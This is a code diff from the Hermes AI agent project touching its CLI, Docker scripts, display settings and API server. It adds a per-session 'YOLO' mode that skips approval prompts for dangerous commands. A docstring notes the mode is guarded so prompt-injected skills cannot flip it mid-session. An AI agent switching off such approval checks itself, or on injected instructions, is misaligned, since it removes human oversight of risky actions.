enable_session_yolo(new_session_id)
disable_session_yolo(old_session_id)
def _is_session_yolo_active(self) -> bool:
"""Whether YOLO bypass is currently enabled for this CLI session.
Reads from ``tools.approval._session_yolo`` (the same set that
``enable_session_yolo`` / ``disable_session_yolo`` write to) so the
status bar reflects the actual bypass state instead of a stale env
var. Also honors the process-start ``--yolo`` flag, which freezes
``HERMES_YOLO_MODE`` into ``_YOLO_MODE_FROZEN`` before tool imports
happen.
"""
try:
from tools.approval import (
_YOLO_MODE_FROZEN,
is_session_yolo_enabled,
)
except Exception:
return False
if _YOLO_MODE_FROZEN:
return True
# Use ``getattr`` so test fixtures that build a CLI via ``__new__``
# (skipping ``__init__``) don't trip an AttributeError here; the
# status-bar builders swallow exceptions silently but lose every
# field after the failure.
session_key = getattr(self, "session_id", None) or "default"
return is_session_yolo_enabled(session_key)
def _toggle_yolo(self):
"""Toggle YOLO mode — skip all dangerous command approval prompts.
Per-session toggle that mirrors the gateway and TUI ``/yolo`` handlers
(see ``gateway/run.py:_handle_yolo_command`` and
``tui_gateway/server.py`` key=="yolo"). We deliberately do NOT mutate
``HERMES_YOLO_MODE`` here that env var is read once at module import
time into ``tools.approval._YOLO_MODE_FROZEN`` to keep prompt-injected
skills from flipping the bypass mid-session, so setting it after CLI
startup is a silent no-op. Routing through ``enable_session_yolo`` /
``disable_session_yolo`` gives the same auditable, per-session bypass
the other surfaces have. ``run_conversation`` binds
``self.session_id`` as the active approval session key via
``set_current_session_key`` so the bypass takes effect on the very
next dangerous command in this run.
"""
from hermes_cli.colors import Colors as _Colors
from tools.approval import (
disable_session_yolo,
enable_session_yolo,
is_session_yolo_enabled,
)
session_key = self.session_id or "default"
if is_session_yolo_enabled(session_key):
disable_session_yolo(session_key)
_cprint(
f" ⚠ YOLO mode {_Colors.BOLD}{_Colors.RED}OFF{_Colors.RESET}"
" — dangerous commands will require approval."
)
else:
os.environ["HERMES_YOLO_MODE"] = "1"
enable_session_yolo(session_key)
_cprint(
f" ⚡ YOLO mode {_Colors.BOLD}{_Colors.GREEN}ON{_Colors.RESET}"
" — all commands auto-approved. Use with caution."
@@ -10640,7 +10754,8 @@ class HermesCLI:
if not reqs.get("stt_available", reqs.get("stt_key_set")):
raise RuntimeError(
"Voice mode requires an STT provider for transcription.\n"
"Option 1: pip install faster-whisper (free, local)\n"
"Option 1: uv pip install faster-whisper "
"(free, local; `pip install faster-whisper` also works if pip is on PATH)\n"
"Option 2: Set GROQ_API_KEY (free tier)\n"
"Option 3: Set VOICE_TOOLS_OPENAI_KEY (paid)"
)
@@ -11729,6 +11844,23 @@ class HermesCLI:
set_secret_capture_callback(self._secret_capture_callback)
except Exception:
pass
# Bind this turn's approval session key into the contextvar so
# ``tools.approval.is_current_session_yolo_enabled()`` resolves
# against the same key that ``/yolo`` toggles under (see
# ``_toggle_yolo`` → ``enable_session_yolo(self.session_id)``).
# Mirrors ``tui_gateway/server.py`` and ``gateway/run.py`` which
# bind the same contextvar before invoking the agent.
try:
from tools.approval import (
reset_current_session_key,
set_current_session_key,
)
_approval_session_token = set_current_session_key(
self.session_id or "default"
)
except Exception:
reset_current_session_key = None # type: ignore[assignment]
_approval_session_token = None
agent_message = _voice_prefix + message if _voice_prefix else message
# Prepend pending model switch note so the model knows about the switch
_msn = getattr(self, '_pending_model_switch_note', None)
@@ -11770,6 +11902,15 @@ class HermesCLI:
set_secret_capture_callback(None)
except Exception:
pass
# Release the per-turn approval session key. ``_session_yolo``
# state itself is preserved across turns (so /yolo persists
# for the whole CLI run); we just unbind the contextvar so a
# reused thread doesn't see stale identity on its next run.
if _approval_session_token is not None and reset_current_session_key is not None:
try:
reset_current_session_key(_approval_session_token)
except Exception:
pass
# Start agent in background thread (daemon so it cannot keep the
# process alive when the user closes the terminal tab — SIGHUP
@@ -11900,6 +12041,7 @@ class HermesCLI:
and getattr(self.agent, "session_id", None)
and self.agent.session_id != self.session_id
):
self._transfer_session_yolo(self.session_id, self.agent.session_id)
self.session_id = self.agent.session_id
self._pending_title = None
@@ -13352,7 +13494,10 @@ class HermesCLI:
line_count = pasted_text.count('\n')
buf = event.current_buffer
threshold = self.config.get("paste_collapse_threshold", 5)
if threshold > 0 and line_count >= threshold and not buf.text.strip().startswith('/'):
char_threshold = self.config.get("paste_collapse_char_threshold", 2000)
lines_hit = threshold > 0 and line_count >= threshold
chars_hit = char_threshold > 0 and len(pasted_text) >= char_threshold
if (lines_hit or chars_hit) and not buf.text.strip().startswith('/'):
_paste_counter[0] += 1
paste_dir = _hermes_home / "pastes"
paste_dir.mkdir(parents=True, exist_ok=True)
@@ -13521,8 +13666,11 @@ class HermesCLI:
newlines_added = line_count - _prev_newline_count[0]
_prev_newline_count[0] = line_count
is_paste = chars_added > 1 or newlines_added >= 4
threshold = self.config.get("paste_collapse_threshold_fallback", 0)
if threshold > 0 and line_count >= threshold and is_paste and not text.startswith('/'):
threshold = self.config.get("paste_collapse_threshold_fallback", 5)
char_threshold = self.config.get("paste_collapse_char_threshold", 2000)
lines_hit = threshold > 0 and line_count >= threshold
chars_hit = char_threshold > 0 and len(text) >= char_threshold
if (lines_hit or chars_hit) and is_paste and not text.startswith('/'):
_paste_counter[0] += 1
paste_dir = _hermes_home / "pastes"
paste_dir.mkdir(parents=True, exist_ok=True)
@@ -14934,6 +15082,39 @@ def main(
time.sleep(_grace)
except Exception:
pass # never block signal handling
# Kanban worker exit path (#28181): SIGTERM hits a dispatcher-spawned
# worker that's likely in a non-daemon thread waiting on a child
# subprocess in _wait_for_process. Raising KeyboardInterrupt only
# unwinds the main thread; the worker thread keeps running, the
# process gets reparented to init, and the dispatcher's _pid_alive
# check returns True forever — task stuck in 'running' indefinitely.
# Skip the controlled-unwind dance and call os._exit(0) so the kernel
# reclaims the PID immediately and detect_crashed_workers can reclaim
# the stale claim on the next tick. Flush logging + stdout/stderr
# first so the final debug trace isn't lost; SIGALRM deadman guards
# the flush against any rare blocking-I/O case (the reporter measured
# flush in <1ms; the alarm is a failsafe, not the common path).
if os.environ.get("HERMES_KANBAN_TASK"):
try:
import signal as _sig_mod
if hasattr(_sig_mod, "SIGALRM"):
# Cancel any pre-existing alarm to avoid colliding with
# caller-installed timers.
_sig_mod.signal(_sig_mod.SIGALRM, lambda *_: os._exit(0))
_sig_mod.alarm(2)
except Exception:
pass
try:
import logging as _lg
_lg.shutdown()
except Exception:
pass
for _stream in (sys.stdout, sys.stderr):
try:
_stream.flush()
except Exception:
pass
os._exit(0)
raise KeyboardInterrupt()
try:
import signal as _signal
@@ -14946,13 +15127,50 @@ def main(
# Handle single query mode
if query or image:
query, single_query_images = _collect_query_images(query, image)
# Kanban workers spawn with ``hermes chat -q "work kanban task <id>"``;
# the actual task description lives in the task body. Mirror the
# gateway/CLI behaviour for inbound images by scanning the body for
# local image paths and http(s) image URLs and attaching them to the
# worker's first turn. Without this, users who paste a screenshot
# path or URL into a kanban task body never get it routed to the
# model's vision input.
single_query_image_urls: list[str] = []
_kanban_task_id = os.environ.get("HERMES_KANBAN_TASK", "").strip()
if _kanban_task_id:
try:
from hermes_cli import kanban_db as _kb
from agent.image_routing import extract_image_refs as _extract_refs
_conn = _kb.connect()
try:
_task = _kb.get_task(_conn, _kanban_task_id)
finally:
try:
_conn.close()
except Exception:
pass
_body = getattr(_task, "body", "") if _task is not None else ""
if _body:
_kb_paths, _kb_urls = _extract_refs(_body)
if _kb_paths:
# Dedupe against any --image the user already passed.
_seen = {str(p) for p in single_query_images}
for _p in _kb_paths:
if _p not in _seen:
_seen.add(_p)
single_query_images.append(Path(_p))
if _kb_urls:
single_query_image_urls.extend(_kb_urls)
except Exception as _exc:
# Best-effort enrichment; never block worker startup on it.
logger.debug("kanban image-ref extraction failed: %s", _exc)
if quiet:
# Quiet mode: suppress banner, spinner, tool previews.
# Only print the final response and parseable session info.
cli.tool_progress_mode = "off"
if cli._ensure_runtime_credentials():
effective_query: Any = query
if single_query_images:
if single_query_images or single_query_image_urls:
# Honour the same image-routing decision used by the
# interactive path. With a vision-capable model (incl.
# custom-provider models declared via
@@ -14981,19 +15199,26 @@ def main(
_parts, _skipped = _build_parts(
query if isinstance(query, str) else "",
[str(p) for p in single_query_images],
image_urls=list(single_query_image_urls) or None,
)
if any(p.get("type") == "image_url" for p in _parts):
effective_query = _parts
else:
# All images unreadable — text fallback.
# ``_preprocess_images_with_vision`` only knows
# about local files; URLs would be lost there,
# so keep the original query text intact when
# only URLs were supplied.
if single_query_images:
effective_query = cli._preprocess_images_with_vision(
query, single_query_images, announce=False,
)
except Exception:
if single_query_images:
effective_query = cli._preprocess_images_with_vision(
query, single_query_images, announce=False,
)
except Exception:
effective_query = cli._preprocess_images_with_vision(
query, single_query_images, announce=False,
)
else:
elif single_query_images:
effective_query = cli._preprocess_images_with_vision(
query,
single_query_images,
+38
View File
@@ -0,0 +1,38 @@
#
# docker-compose.windows.yml — Windows Docker Desktop compatible
#
# Differences from docker-compose.yml:
# - Removes `network_mode: host` (not supported on Docker Desktop for Windows)
# - Uses explicit port mappings instead
# - Uses Windows-style volume path for ~/.hermes
#
# Usage:
# docker compose -f docker-compose.windows.yml up -d
#
services:
gateway:
image: nousresearch/hermes-agent:latest
container_name: hermes
restart: unless-stopped
volumes:
- ${USERPROFILE}/.hermes:/opt/data
environment:
- HERMES_UID=10000
- HERMES_GID=10000
command: ["gateway", "run"]
dashboard:
image: nousresearch/hermes-agent:latest
container_name: hermes-dashboard
restart: unless-stopped
depends_on:
- gateway
volumes:
- ${USERPROFILE}/.hermes:/opt/data
environment:
- HERMES_UID=10000
- HERMES_GID=10000
- HERMES_DASHBOARD_HOST=0.0.0.0
ports:
- "127.0.0.1:9119:9119"
command: ["dashboard", "--host", "0.0.0.0", "--port", "9119", "--no-open", "--insecure"]
+87
View File
@@ -0,0 +1,87 @@
#!/bin/sh
# shellcheck shell=sh
# /opt/hermes/bin/hermes — `docker exec` privilege-drop shim.
#
# Background
# ----------
# The s6 image runs the supervised gateway/main process as the unprivileged
# `hermes` user (UID 10000). When an operator runs `docker exec <c> hermes ...`
# the default UID is root (0), and any file the command writes under
# $HERMES_HOME — auth.json, .env, config.yaml — ends up root-owned and
# unreadable to the supervised gateway. The most common manifestation: the
# user runs `docker exec <c> hermes login`, this writes
# /opt/data/auth.json as root:root mode 0600, and from then on the gateway
# returns "Provider authentication failed: Hermes is not logged into Nous
# Portal" on every incoming message — even though `docker exec <c> hermes
# chat -q ping` (also running as root) succeeds because root happens to be
# able to read its own root-owned file. See systematic-debugging skill
# notes attached to this fix.
#
# Fix
# ---
# This shim sits at /opt/hermes/bin/hermes and is placed earliest on PATH.
# When invoked as root, it drops to the hermes user (via s6-setuidgid)
# before exec'ing the real venv binary, so anything that writes under
# $HERMES_HOME is uid-aligned with the supervised processes. When invoked
# as any non-root UID — including the supervised processes themselves,
# `docker exec --user hermes`, kanban subagents, etc. — it short-circuits
# straight to the venv binary with no privilege change. Net: one extra
# fork on the docker-exec-as-root path, zero behavioral change on every
# other path.
#
# Recursion safety: the shim exec's the venv binary by *absolute path*
# (/opt/hermes/.venv/bin/hermes), so the second hop cannot re-enter this
# shim regardless of PATH state. No sentinel env var needed.
#
# Opt-out: set HERMES_DOCKER_EXEC_AS_ROOT=1 (1/true/yes, case-insensitive)
# to keep running as root. Reserved for diagnostic sessions where the
# operator deliberately wants root semantics — e.g. inspecting root-only
# state via the hermes CLI. Default is to drop.
set -e
REAL=/opt/hermes/.venv/bin/hermes
# Defensive: if the venv binary is missing (corrupted image, partial
# install), fail loudly rather than silently masking it.
if [ ! -x "$REAL" ]; then
echo "hermes-shim: $REAL not found or not executable" >&2
exit 127
fi
# Already non-root? Just exec the real binary. This is the hot path for
# supervised processes (uid 10000) and for `docker exec --user hermes`.
if [ "$(id -u)" != "0" ]; then
exec "$REAL" "$@"
fi
# Root, with opt-out set? Honor it.
case "${HERMES_DOCKER_EXEC_AS_ROOT:-}" in
1|true|TRUE|True|yes|YES|Yes)
exec "$REAL" "$@"
;;
esac
# Root, no opt-out. Drop to the hermes user.
#
# s6-setuidgid lives under /command/ which is NOT on `docker exec`'s PATH
# (s6-overlay only puts /command/ on PATH for supervision-tree children).
# Reference it by absolute path so the drop is robust against PATH
# manipulation.
S6_SUID=/command/s6-setuidgid
if [ ! -x "$S6_SUID" ]; then
# Non-s6 image (someone stripped s6-overlay, or a hand-built variant).
# Fail loud rather than silently re-execing as root and leaking the
# bug this shim exists to prevent.
echo "hermes-shim: $S6_SUID not found; refusing to silently run as root." >&2
echo "hermes-shim: re-run with --user hermes or set HERMES_DOCKER_EXEC_AS_ROOT=1." >&2
exit 126
fi
# Reset HOME to the hermes user's home before dropping privileges. Without
# this, $HOME stays /root and any library that resolves paths off $HOME
# (XDG caches, lockfiles, .config writes) will try to write to /root and
# fail with EACCES. Mirrors main-wrapper.sh.
export HOME=/opt/data
exec "$S6_SUID" hermes "$REAL" "$@"
+14 -1
View File
@@ -1,9 +1,16 @@
#!/bin/sh
#!/command/with-contenv sh
# shellcheck shell=sh
# /opt/hermes/docker/main-wrapper.sh — wraps the container's CMD with
# the same argument-routing logic the pre-s6 entrypoint.sh used. Runs
# as /init's "main program" (Docker CMD) so it inherits stdin/stdout/
# stderr from the container.
#
# Shebang note: /init scrubs env before invoking CMD, so a plain
# `#!/bin/sh` wrapper sees an empty environ and `ENV HERMES_HOME=/opt/data`
# from the Dockerfile never reaches `hermes`. with-contenv repopulates
# the env from /run/s6/container_environment before exec'ing, which is
# what s6-supervised services use too (see main-hermes/run).
#
# Routing:
# no args → exec `hermes` (the default)
# first arg is an executable → exec it directly (sleep, bash, sh, …)
@@ -13,6 +20,12 @@
# workload runs unprivileged (UID 10000 by default).
set -e
# HOME comes through with-contenv as /root (the /init context). Override
# to the hermes user's home before dropping privileges so libraries that
# resolve paths via $HOME (e.g. discord lockfile under XDG_STATE_HOME)
# don't try to write to /root.
export HOME=/opt/data
cd /opt/data
# shellcheck disable=SC1091
. /opt/hermes/.venv/bin/activate
+18 -6
View File
@@ -19,6 +19,10 @@ case "${HERMES_DASHBOARD:-}" in
;;
esac
# with-contenv repopulates HOME from /init as /root. Reset it before
# dropping privileges so HOME-anchored state lands under /opt/data.
export HOME=/opt/data
cd /opt/data
# shellcheck disable=SC1091
. /opt/hermes/.venv/bin/activate
@@ -26,13 +30,21 @@ cd /opt/data
dash_host="${HERMES_DASHBOARD_HOST:-0.0.0.0}"
dash_port="${HERMES_DASHBOARD_PORT:-9119}"
# Binding to anything other than localhost requires --insecure — the
# dashboard refuses otherwise because it exposes API keys. Inside a
# container this is the expected deployment.
# `--insecure` is opt-in via HERMES_DASHBOARD_INSECURE. The dashboard's
# OAuth auth gate engages automatically on non-loopback binds when a
# DashboardAuthProvider is registered (e.g. the bundled dashboard_auth/nous
# provider, which auto-registers when HERMES_DASHBOARD_OAUTH_CLIENT_ID is
# set). If no provider is registered, start_server fails closed with a
# specific operator-facing error.
#
# This used to derive --insecure from the bind host ("anything non-loopback
# implies insecure"), but that predates the OAuth gate and silently
# disabled it on every container-deployed dashboard. The gate is now the
# authority; operators on trusted LANs / behind a reverse proxy without
# the OAuth contract opt in explicitly.
insecure=""
case "$dash_host" in
127.0.0.1|localhost) ;;
*) insecure="--insecure" ;;
case "${HERMES_DASHBOARD_INSECURE:-}" in
1|true|TRUE|True|yes|YES|Yes) insecure="--insecure" ;;
esac
# shellcheck disable=SC2086 # word-splitting of $insecure is intentional
+99 -7
View File
@@ -20,6 +20,18 @@ set -eu
HERMES_HOME="${HERMES_HOME:-/opt/data}"
INSTALL_DIR="/opt/hermes"
# --- Bootstrap HERMES_HOME as root ---
# Create the directory (and any missing parents) while we still have root
# privileges so the chown checks below see real metadata and the later
# `s6-setuidgid hermes mkdir -p` block doesn't EACCES on root-owned
# ancestors. Without this, custom HERMES_HOME paths whose parents only
# root can create (e.g. `HERMES_HOME=/home/hermes/.hermes` in a Compose
# file, or any path under a fresh / not pre-populated by the image)
# fail on first boot with `mkdir: cannot create directory '/...': Permission
# denied` and the cont-init hook exits non-zero. Idempotent — `mkdir -p`
# is a no-op if the dir already exists. (#18482, salvages #18488)
mkdir -p "$HERMES_HOME"
# --- UID/GID remap ---
if [ -n "${HERMES_UID:-}" ] && [ "$HERMES_UID" != "$(id -u hermes)" ]; then
echo "[stage2] Changing hermes UID to $HERMES_UID"
@@ -33,6 +45,14 @@ if [ -n "${HERMES_GID:-}" ] && [ "$HERMES_GID" != "$(id -g hermes)" ]; then
fi
# --- Fix ownership of data volume ---
# When HERMES_UID is remapped or the top-level $HERMES_HOME isn't owned by
# the runtime hermes UID, restore ownership to hermes — but ONLY for the
# directories hermes actually writes to. The full $HERMES_HOME may be a
# host-mounted bind containing unrelated user files; `chown -R` would
# silently destroy host ownership of those (see issue #19788).
#
# The canonical list of hermes-owned subdirs is the same one the s6-setuidgid
# mkdir -p block below seeds. Keep them in sync if the seed list changes.
actual_hermes_uid=$(id -u hermes)
needs_chown=false
if [ -n "${HERMES_UID:-}" ] && [ "$HERMES_UID" != "10000" ]; then
@@ -41,16 +61,45 @@ elif [ "$(stat -c %u "$HERMES_HOME" 2>/dev/null)" != "$actual_hermes_uid" ]; the
needs_chown=true
fi
if [ "$needs_chown" = true ]; then
echo "[stage2] Fixing ownership of $HERMES_HOME to hermes ($actual_hermes_uid)"
echo "[stage2] Fixing ownership of $HERMES_HOME (targeted) to hermes ($actual_hermes_uid)"
# In rootless Podman the container's "root" is mapped to an
# unprivileged host UID — chown will fail. That's fine: the volume
# is already owned by the mapped user on the host side.
chown -R hermes:hermes "$HERMES_HOME" 2>/dev/null || \
echo "[stage2] Warning: chown failed (rootless container?) — continuing"
# The .venv must also be re-chowned when UID is remapped, otherwise
# lazy_deps.py cannot install platform packages (discord.py, etc.).
chown -R hermes:hermes "$INSTALL_DIR/.venv" 2>/dev/null || \
echo "[stage2] Warning: chown .venv failed (rootless container?) — continuing"
#
# Top-level $HERMES_HOME: chown the directory itself (not its contents)
# so hermes can mkdir new subdirs but bind-mounted host files keep
# their existing ownership.
chown hermes:hermes "$HERMES_HOME" 2>/dev/null || \
echo "[stage2] Warning: chown $HERMES_HOME failed (rootless container?) — continuing"
# Hermes-owned subdirs: recursive chown is safe here because these are
# created and managed exclusively by hermes (see the s6-setuidgid mkdir
# -p block below for the canonical list).
for sub in cron sessions logs hooks memories skills skins plans workspace home profiles; do
if [ -e "$HERMES_HOME/$sub" ]; then
chown -R hermes:hermes "$HERMES_HOME/$sub" 2>/dev/null || \
echo "[stage2] Warning: chown $HERMES_HOME/$sub failed (rootless container?) — continuing"
fi
done
# Hermes-owned trees under $INSTALL_DIR must be re-chowned when the UID
# is remapped — otherwise:
# - .venv: lazy_deps.py cannot install platform packages (discord.py,
# telegram, slack, etc.) with EACCES (#15012, #21100)
# - ui-tui: esbuild rebuilds dist/entry.js on every TUI launch (when
# the source mtime is newer than dist/ or when HERMES_TUI_FORCE_BUILD
# is set) and writes to ui-tui/dist/. Without this chown the new
# hermes UID can't write the build output (#28851).
# - node_modules: root-level dependencies (puppeteer, web tooling)
# that runtime code may walk/update.
# The set mirrors the build-time `chown -R hermes:hermes` line in the
# Dockerfile — keep them in sync if the Dockerfile chown set changes.
# These are under $INSTALL_DIR (not $HERMES_HOME), so the bind-mount
# concern doesn't apply — recursive is fine.
chown -R hermes:hermes \
"$INSTALL_DIR/.venv" \
"$INSTALL_DIR/ui-tui" \
"$INSTALL_DIR/node_modules" \
2>/dev/null || \
echo "[stage2] Warning: chown of build trees failed (rootless container?) — continuing"
fi
# Always reset ownership of $HERMES_HOME/profiles to hermes on every
@@ -139,4 +188,47 @@ if [ -d "$INSTALL_DIR/skills" ]; then
|| echo "[stage2] Warning: skills_sync.py failed; continuing"
fi
# --- Discover agent-browser's Chromium binary ---
# The image's Dockerfile runs `npx playwright install chromium`, which
# populates ``$PLAYWRIGHT_BROWSERS_PATH`` (=/opt/hermes/.playwright) with
# a ``chromium_headless_shell-<build>/chrome-headless-shell-linux64/``
# directory. agent-browser (the runtime CLI Hermes spawns for the
# browser tool) doesn't recognise this layout in its own cache scan and
# fails with "Auto-launch failed: Chrome not found" — even though the
# binary is right there (#15697).
#
# Fix: locate the binary at boot and export ``AGENT_BROWSER_EXECUTABLE_PATH``
# via /run/s6/container_environment so the `with-contenv` shebang on
# main-wrapper.sh propagates it into the supervised ``hermes`` process
# and thence to agent-browser subprocesses.
#
# - Skipped when the user has already set ``AGENT_BROWSER_EXECUTABLE_PATH``
# (lets users override with a system Chrome install).
# - Filename-matched (not path-matched): the chromium dir contains many
# shared libraries (libGLESv2.so, libEGL.so, ...) which inherit the
# executable bit from Playwright's tarball but are NOT browser binaries.
# We only accept files whose basename is chrome / chromium /
# chrome-headless-shell / chromium-browser. Compare PR #18635's earlier
# ``find | grep -Ei 'chrome|chromium'`` which would match the path
# ``.../chrome-headless-shell-linux64/libGLESv2.so`` and pick a .so.
# - Quietly skipped when $PLAYWRIGHT_BROWSERS_PATH doesn't exist (e.g.
# custom builds that strip Playwright).
if [ -z "${AGENT_BROWSER_EXECUTABLE_PATH:-}" ] && \
[ -n "${PLAYWRIGHT_BROWSERS_PATH:-}" ] && \
[ -d "$PLAYWRIGHT_BROWSERS_PATH" ]; then
browser_bin=$(find "$PLAYWRIGHT_BROWSERS_PATH" -type f -executable \
\( -name 'chrome' -o -name 'chromium' \
-o -name 'chrome-headless-shell' -o -name 'chromium-browser' \) \
2>/dev/null | head -n 1)
if [ -n "$browser_bin" ]; then
echo "[stage2] Found agent-browser Chromium binary: $browser_bin"
# Write to s6's container_environment so with-contenv picks it
# up for all supervised services (main-hermes, dashboard, etc.).
# Idempotent: each boot overwrites with the current path.
printf '%s' "$browser_bin" > /run/s6/container_environment/AGENT_BROWSER_EXECUTABLE_PATH
else
echo "[stage2] Warning: no Chromium binary under $PLAYWRIGHT_BROWSERS_PATH; browser tool may fail"
fi
fi
echo "[stage2] Setup complete; starting user services"
+37 -3
View File
@@ -35,7 +35,12 @@ _GLOBAL_DEFAULTS: dict[str, Any] = {
"show_reasoning": False,
"tool_preview_length": 0,
"streaming": None, # None = follow top-level streaming config
# When true, delete tool-progress / "Still working..." / status bubbles
# Gateway-only assistant/status chatter controls. These default on for
# back-compat, but mobile platforms can opt down to final-answer-first.
"interim_assistant_messages": True,
"long_running_notifications": True,
"busy_ack_detail": True,
# When true, delete tool-progress / "⏳ Working — N min" / status bubbles
# after the final response lands on platforms that support message
# deletion (e.g. Telegram). Off by default — progress is still shown
# live, just cleaned up after success so the chat doesn't fill up with
@@ -56,6 +61,9 @@ _TIER_HIGH = {
"show_reasoning": False,
"tool_preview_length": 40,
"streaming": None, # follow global
"interim_assistant_messages": True,
"long_running_notifications": True,
"busy_ack_detail": True,
}
_TIER_MEDIUM = {
@@ -63,6 +71,9 @@ _TIER_MEDIUM = {
"show_reasoning": False,
"tool_preview_length": 40,
"streaming": None,
"interim_assistant_messages": True,
"long_running_notifications": True,
"busy_ack_detail": True,
}
_TIER_LOW = {
@@ -70,6 +81,9 @@ _TIER_LOW = {
"show_reasoning": False,
"tool_preview_length": 40,
"streaming": False,
"interim_assistant_messages": False,
"long_running_notifications": False,
"busy_ack_detail": False,
}
_TIER_MINIMAL = {
@@ -77,11 +91,25 @@ _TIER_MINIMAL = {
"show_reasoning": False,
"tool_preview_length": 0,
"streaming": False,
"interim_assistant_messages": False,
"long_running_notifications": False,
"busy_ack_detail": False,
}
_PLATFORM_DEFAULTS: dict[str, dict[str, Any]] = {
# Tier 1 — full edit support, personal/team use
"telegram": {**_TIER_HIGH, "tool_progress": "new"},
# Telegram is usually a mobile inbox: keep tool_progress quiet and skip
# the verbose busy-ack iteration counter, but DO surface real mid-turn
# assistant commentary (interim_assistant_messages) and DO send periodic
# heartbeats (long_running_notifications) so the user has signal between
# turn start and final answer. Otherwise it looks like "typing..." for
# 30 minutes with nothing happening. Opt in to verbose iteration detail
# via display.platforms.telegram.busy_ack_detail / tool_progress.
"telegram": {
**_TIER_HIGH,
"tool_progress": "off",
"busy_ack_detail": False,
},
"discord": _TIER_HIGH,
# Tier 2 — edit support, often customer/workspace channels
@@ -190,7 +218,13 @@ def _normalise(setting: str, value: Any) -> Any:
if value is True:
return "all"
return str(value).lower()
if setting in {"show_reasoning", "streaming"}:
if setting in {
"show_reasoning",
"streaming",
"interim_assistant_messages",
"long_running_notifications",
"busy_ack_detail",
}:
if isinstance(value, str):
return value.lower() in {"true", "1", "yes", "on"}
return bool(value)
+591 -17
View File
@@ -8,6 +8,12 @@ Exposes an HTTP server with endpoints:
- DELETE /v1/responses/{response_id} Delete a stored response
- GET /v1/models lists hermes-agent as an available model
- GET /v1/capabilities machine-readable API capabilities for external UIs
- GET /api/sessions list client-visible Hermes sessions
- POST /api/sessions create an empty Hermes session
- GET/PATCH/DELETE /api/sessions/{session_id} read/update/delete a session
- GET /api/sessions/{session_id}/messages read session message history
- POST /api/sessions/{session_id}/fork branch a session using SessionDB lineage
- POST /api/sessions/{session_id}/chat[/stream] chat with a persisted session
- POST /v1/runs start a run, returns run_id immediately (202)
- GET /v1/runs/{run_id} retrieve current run status
- GET /v1/runs/{run_id}/events SSE stream of structured lifecycle events
@@ -18,7 +24,8 @@ Exposes an HTTP server with endpoints:
Any OpenAI-compatible frontend (Open WebUI, LobeChat, LibreChat,
AnythingLLM, NextChat, ChatBox, etc.) can connect to hermes-agent
through this adapter by pointing at http://localhost:8642/v1.
through this adapter by pointing at http://localhost:8642/v1 and
authenticating with API_SERVER_KEY.
Requires:
- aiohttp (already available in the gateway)
@@ -313,6 +320,20 @@ def _multimodal_validation_error(exc: ValueError, *, param: str) -> "web.Respons
)
def _session_chat_user_message(body: Dict[str, Any], *, param: str = "message") -> tuple[Any, Optional["web.Response"]]:
"""Parse and normalize session chat ``message`` / ``input`` like chat completions."""
user_message = body.get("message") or body.get("input")
if not _content_has_visible_payload(user_message):
return None, web.json_response(
_openai_error("Missing 'message' field", code="missing_message"),
status=400,
)
try:
return _normalize_multimodal_content(user_message), None
except ValueError as exc:
return None, _multimodal_validation_error(exc, param=param)
def check_api_server_requirements() -> bool:
"""Check if API server dependencies are available."""
return AIOHTTP_AVAILABLE
@@ -824,11 +845,11 @@ class APIServerAdapter(BasePlatformAdapter):
Validate Bearer token from Authorization header.
Returns None if auth is OK, or a 401 web.Response on failure.
If no API key is configured, all requests are allowed (only when API
server is local).
connect() refuses to start the API server without API_SERVER_KEY, so
the no-key branch only exists for tests or unsupported manual wiring.
"""
if not self._api_key:
return None # No key configured — allow all (local-only use)
return None
auth_header = request.headers.get("Authorization", "")
if auth_header.startswith("Bearer "):
@@ -1086,6 +1107,16 @@ class APIServerAdapter(BasePlatformAdapter):
"run_approval_response": True,
"tool_progress_events": True,
"approval_events": True,
"session_resources": True,
"session_chat": True,
"session_chat_streaming": True,
"session_fork": True,
"admin_config_rw": False,
"jobs_admin": False,
"memory_write_api": False,
"skills_api": True,
"audio_api": False,
"realtime_voice": False,
"session_continuity_header": "X-Hermes-Session-Id",
"session_key_header": "X-Hermes-Session-Key",
"cors": bool(self._cors_origins),
@@ -1101,9 +1132,540 @@ class APIServerAdapter(BasePlatformAdapter):
"run_events": {"method": "GET", "path": "/v1/runs/{run_id}/events"},
"run_approval": {"method": "POST", "path": "/v1/runs/{run_id}/approval"},
"run_stop": {"method": "POST", "path": "/v1/runs/{run_id}/stop"},
"skills": {"method": "GET", "path": "/v1/skills"},
"toolsets": {"method": "GET", "path": "/v1/toolsets"},
"sessions": {"method": "GET", "path": "/api/sessions"},
"session_create": {"method": "POST", "path": "/api/sessions"},
"session": {"method": "GET", "path": "/api/sessions/{session_id}"},
"session_update": {"method": "PATCH", "path": "/api/sessions/{session_id}"},
"session_delete": {"method": "DELETE", "path": "/api/sessions/{session_id}"},
"session_messages": {"method": "GET", "path": "/api/sessions/{session_id}/messages"},
"session_fork": {"method": "POST", "path": "/api/sessions/{session_id}/fork"},
"session_chat": {"method": "POST", "path": "/api/sessions/{session_id}/chat"},
"session_chat_stream": {"method": "POST", "path": "/api/sessions/{session_id}/chat/stream"},
},
})
async def _handle_skills(self, request: "web.Request") -> "web.Response":
"""GET /v1/skills — list installed skills visible to the API-server agent.
Read-only listing intended for external clients that need to know
which skills are available without sending a chat message and asking
the model. Mirrors what the gateway/CLI surfaces through
``/skills list``, but as a deterministic JSON payload.
Returns the same skill metadata (name, description, category) the
skills hub uses internally. Disabled skills are excluded so the
listing matches what the agent actually loads.
"""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
try:
from tools.skills_tool import _find_all_skills, _sort_skills
skills = _sort_skills(_find_all_skills(skip_disabled=False))
except Exception:
logger.exception("GET /v1/skills failed")
return web.json_response(
_openai_error("Failed to enumerate skills", err_type="server_error"),
status=500,
)
return web.json_response({
"object": "list",
"data": skills,
})
async def _handle_toolsets(self, request: "web.Request") -> "web.Response":
"""GET /v1/toolsets — list toolsets and their resolved tools.
Returns the toolset surface the api_server platform actually exposes
to its agent: each toolset's enabled/configured state plus the
concrete tool names it expands to. This is the deterministic
equivalent of what a client would otherwise have to recover by
asking the model what tools it can call.
"""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
try:
from hermes_cli.config import load_config
from hermes_cli.tools_config import (
_get_effective_configurable_toolsets,
_get_platform_tools,
_toolset_has_keys,
)
from toolsets import resolve_toolset
config = load_config()
enabled_toolsets = _get_platform_tools(
config,
"api_server",
include_default_mcp_servers=False,
)
data: List[Dict[str, Any]] = []
for name, label, desc in _get_effective_configurable_toolsets():
try:
tools = sorted(set(resolve_toolset(name)))
except Exception:
tools = []
is_enabled = name in enabled_toolsets
data.append({
"name": name,
"label": label,
"description": desc,
"enabled": is_enabled,
